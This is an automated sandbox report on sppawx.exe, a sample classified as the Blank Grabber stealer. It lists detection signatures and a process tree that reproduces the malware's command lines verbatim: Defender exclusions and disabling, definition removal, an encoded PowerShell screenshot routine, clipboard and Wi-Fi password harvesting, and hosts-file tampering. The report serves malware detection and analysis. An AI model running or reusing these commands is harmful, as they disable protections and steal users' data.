Edit tour

Windows Analysis Report
sppawx.exe

Overview

General Information

Sample name:	sppawx.exe
Analysis ID:	1574325
MD5:	546606959cb5b178d679b203d938cf88
SHA1:	f907e7d19734bf7459388b3299822858f0039711
SHA256:	5184b92097feeecf09d4e92b58c252333d397b3b7c424b62e73ae2fc2f6be405
Tags:	exegithub-com--hombozuser-JAMESWT_MHT
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the hosts file

Potential dropper URLs found in powershell memory

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Writes or reads registry keys via WMI

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

sppawx.exe (PID: 7808 cmdline: "C:\Users\user\Desktop\sppawx.exe" MD5: 546606959CB5B178D679B203D938CF88)

sppawx.exe (PID: 7860 cmdline: "C:\Users\user\Desktop\sppawx.exe" MD5: 546606959CB5B178D679B203D938CF88)

cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8136 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8072 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 7196 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 8124 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 8016 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8160 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7220 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4460 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2060 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7964 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 1320 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7196 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7340 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 332 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7328 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6680 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3860 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 4068 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4476 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 5664 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2724 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8104 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1556 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 1320 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2960 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 2624 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 3060 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7836 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 2092 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 3592 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 332 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2620 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 3472 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7244 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 4384 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7596 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 2884 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 5968 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 6148 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 7936 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

